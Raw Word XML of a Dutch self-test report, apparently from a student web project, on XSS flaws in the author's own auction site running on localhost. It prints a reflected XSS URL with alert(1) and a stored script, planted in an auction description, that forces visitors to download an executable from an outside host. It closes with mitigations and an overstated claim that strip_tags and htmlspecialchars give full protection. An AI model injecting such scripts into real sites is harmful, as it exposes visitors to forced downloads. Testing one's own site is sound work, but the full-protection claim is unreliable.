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2C08" w14:textId="1420CCE9" w:rsidR="004748AC" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS aanvallen: testen of onze site </w:t>
      </w:r>
      <w:r w:rsidR="001C7FA4">
        <w:t>ertegen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>beschermt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is, en welke veranderingen moeten gemaakt worden om de website te beschermen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CAF003" w14:textId="5B667356" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="046398B1" w14:textId="7BE567BC" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="2AC9824C" w14:textId="0F985FC6" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="639EF150" w14:textId="639C87B7" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="070F68C7" w14:textId="75333FFB" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="4A2A6809" w14:textId="57E5F1D1" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="2B7AC2E2" w14:textId="1F93176B" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="68F62A00" w14:textId="46B642CD" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="592D9587" w14:textId="44CE3AD4" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="36B3A83D" w14:textId="254A021B" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="233F8666" w14:textId="5713C08F" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="2BCF0F0F" w14:textId="41817583" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="1E85EBDF" w14:textId="12B69638" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="01AD8B69" w14:textId="79C9DCEF" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="502DB9F5" w14:textId="0543C399" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="13B38506" w14:textId="6902F2BF" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="312772BD" w14:textId="51697EF9" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="5738E6C7" w14:textId="3CFA55B5" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="6AB6CC6E" w14:textId="01CD8356" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="443438E2" w14:textId="22770A40" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="4BD1030E" w14:textId="2C6F06B4" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="3A610055" w14:textId="365687A9" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="309F1C83" w14:textId="63159751" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="4E5AF470" w14:textId="126049C0" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="3CC7C7B5" w14:textId="5745366E" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="15460556" w14:textId="64C9C5D1" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Testen doormiddel van tool: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B80B7C">
        <w:t>Xenotix_v_6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB6C8C1" w14:textId="1E40682F" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="27E9A546" w14:textId="1F9D5B06" w:rsidR="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C">
      <w:r>
        <w:t xml:space="preserve">Ik heb getest of onze GET-statements tegen een XSS-aanval getest is. Eerst heb ik gekeken waar op onze website we GET-statements gebruiken. Bij het zoeken naar producten wordt er inderdaad gebruik gemaakt van </w:t>
      </w:r>
      <w:r w:rsidR="008B59E8">
        <w:t>GET-statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Uiteindelijk heb ik in de tool deze </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>URL geplaats</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="50104539" w14:textId="04E0F9D1" w:rsidR="00B80B7C" w:rsidRDefault="008B59E8" w:rsidP="00B80B7C">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B5200B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost/Website%20EenmaalAndermaal/bootstrap-4.3.1-dist/zoeken.php?zoeken=[X</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C6F59" w14:textId="3E26DA76" w:rsidR="008B59E8" w:rsidRDefault="008B59E8" w:rsidP="00B80B7C">
      <w:r>
        <w:t xml:space="preserve">De ‘[X]’ wordt geplaats zodat de tool weet waar hij de XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> moet neerzetten in de zoekbalk. Uiteindelijk was het inderdaad mogelijk om een XSS-aanval op onze site uitvoeren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE751DA" w14:textId="77116A4B" w:rsidR="008B59E8" w:rsidRDefault="008B59E8" w:rsidP="00B80B7C">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00B5200B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost/Website%20EenmaalAndermaal/bootstrap-4.3.1-dist/zoeken.php?zoeken=%27%3E%3Cscript%3Ealert(1)%3C/script%3E</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7227B3AF" w14:textId="6040CD6B" w:rsidR="008B59E8" w:rsidRDefault="008B59E8" w:rsidP="00B80B7C">
      <w:r>
        <w:t xml:space="preserve">Met deze link wordt er via javascript een alert uitgevoerd die het bericht ‘1’ weergeeft. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D92DBA1" w14:textId="212EE161" w:rsidR="00E50E67" w:rsidRDefault="008B59E8" w:rsidP="00B80B7C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="615B9DD1" wp14:editId="0A5ED672">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21525"/>
                <wp:lineTo x="21500" y="21525"/>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410" b="5606"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2752725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Alleen dit is nog niet zo schadelijk, want dit wordt alleen uitgevoerd als je precies de hele</w:t>
      </w:r>
      <w:r w:rsidR="00E50E67">
        <w:t xml:space="preserve"> URL over kopieert. Maar je kan elk javascript in een input veld invoeren. Ik ben er dus achter gekomen, dat je een javascript kan invoeren bij de veiling. Dit script zorgt ervoor dat wanneer een persoon een veiling bezoekt, automatisch een bestand downloadt. Dit is het script dat ik heb ingevoerd in de beschrijving:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F33C94" w14:textId="04A21887" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">%27%3E&lt;script&gt;var link = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('a');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B67CEE2" w14:textId="5601DF30" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>link.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 'http://the.earth.li/~</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sgtatham</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>putty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x86/putty.exe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38789B21" w14:textId="1D0EE138" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>link.download</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E41177" w14:textId="0CD74D32" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.body</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(link);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E94A0" w14:textId="55A513AA" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>link.click</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>();&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0379A688" w14:textId="7F3EFEA2" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D732897" w14:textId="77777777" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545BD7E4" w14:textId="77777777" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69CEE799" w14:textId="77777777" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7992669E" w14:textId="77777777" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF182D9" w14:textId="77777777" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706BE6FB" w14:textId="77777777" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C92370" w14:textId="4867C534" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Als je nu die veiling opent als bezoeker of gebruiker, krijg je dus een vraag om putty</w:t>
      </w:r>
      <w:r w:rsidR="00AA5ED1">
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te downloaden:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ACF201" w14:textId="1AB69131" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="096A0844" w14:textId="68ECB7C0" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16C2F139" wp14:editId="487E1F64">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>309880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21450"/>
                <wp:lineTo x="21500" y="21450"/>
                <wp:lineTo x="215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04" b="5607"/>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103866" w14:textId="77777777" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00E50E67"/>
    <w:p w14:paraId="66036C4B" w14:textId="05D6E969" w:rsidR="001A50CF" w:rsidRDefault="001A50CF" w:rsidP="001A50CF">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Conclusie en maatregelen tegen XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C51CB7" w14:textId="77777777" w:rsidR="001C7FA4" w:rsidRPr="001C7FA4" w:rsidRDefault="001C7FA4" w:rsidP="001C7FA4"/>
    <w:p w14:paraId="3E1112D9" w14:textId="51B348F9" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00B80B7C">
      <w:r>
        <w:t xml:space="preserve">Dus we kunnen wel concluderen dat onze site niet bestendig is tegen XSS aanvallen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4039F29E" w14:textId="0A39FF8C" w:rsidR="00C66520" w:rsidRDefault="00C66520" w:rsidP="00B80B7C">
      <w:r>
        <w:t xml:space="preserve">Wat we hiertegen hebben gedaan, </w:t>
      </w:r>
      <w:r w:rsidR="00E6657E">
        <w:t>is 2 dingen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A19EA37" w14:textId="4C94E325" w:rsidR="00E6657E" w:rsidRDefault="00E6657E" w:rsidP="00B80B7C">
      <w:r>
        <w:t xml:space="preserve">Ten eerste heb ik bij elke </w:t>
      </w:r>
      <w:r w:rsidR="00AE5ECD">
        <w:t>gebruikers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> invoer de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> functie</w:t>
      </w:r>
      <w:r w:rsidR="00AE5ECD">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE5ECD">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strip_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AE5ECD">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gebruikt. Als er voor een of andere reden toch Javascript code doorheen komt, dan gebruiken we</w:t>
      </w:r>
      <w:r w:rsidR="00AE5ECD">
        <w:t xml:space="preserve"> de functie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE5ECD">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E6657E">
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AE5ECD">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> om de te</w:t>
      </w:r>
      <w:r w:rsidR="002A572E">
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">st te laten zien, maar dan letterlijk. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659FA607" w14:textId="3CE32D70" w:rsidR="00AE5ECD" w:rsidRDefault="00AE5ECD" w:rsidP="00B80B7C">
      <w:r>
        <w:t xml:space="preserve">Dus stel je voor als iemand een javascript code in de website heeft kunnen invoeren, dan wordt letterlijk het javascript weergegeven, niet uitgevoerd. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252E6C5" w14:textId="1D3130F5" w:rsidR="001C693B" w:rsidRDefault="001C693B" w:rsidP="00B80B7C">
      <w:r>
        <w:t xml:space="preserve">Als deze 2 functie worden toegepast in do code, dan ben je volledig beveiligd tegen </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>XSS attacks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in elk input veld wat er is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EDA5D3" w14:textId="77777777" w:rsidR="00E50E67" w:rsidRDefault="00E50E67" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="4EBA602F" w14:textId="77777777" w:rsidR="008B59E8" w:rsidRDefault="008B59E8" w:rsidP="00B80B7C"/>
    <w:p w14:paraId="7D0E2425" w14:textId="77777777" w:rsidR="00B80B7C" w:rsidRPr="00B80B7C" w:rsidRDefault="00B80B7C" w:rsidP="00B80B7C"/>
    <w:sectPr w:rsidR="00B80B7C" w:rsidRPr="00B80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066D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18F27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AC"/>
    <w:rsid w:val="00083E51"/>
    <w:rsid w:val="001A50CF"/>
    <w:rsid w:val="001C693B"/>
    <w:rsid w:val="001C7FA4"/>
    <w:rsid w:val="002A572E"/>
    <w:rsid w:val="002D5719"/>
    <w:rsid w:val="004748AC"/>
    <w:rsid w:val="008B59E8"/>
    <w:rsid w:val="00AA5ED1"/>
    <w:rsid w:val="00AE5ECD"/>
    <w:rsid w:val="00B80B7C"/>
    <w:rsid w:val="00C66520"/>
    <w:rsid w:val="00E50E67"/>
    <w:rsid w:val="00E665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19B6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CEBEF70E-1F55-47D5-BAF9-9E8F159A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0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80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0B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80B7C"/>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B59E8"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Onopgelostemelding">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Standaardalinea-lettertype"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008B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71721">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1009259880">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1569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Website%20EenmaalAndermaal/bootstrap-4.3.1-dist/zoeken.php?zoeken=%27%3E%3Cscript%3Ealert(1)%3C/script%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Website%20EenmaalAndermaal/bootstrap-4.3.1-dist/zoeken.php?zoeken=%5b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6A56-668C-4B58-9EF0-EBB5B5B0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03</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meltink</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Wesley Smeltink</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-29T08:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-29T10:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>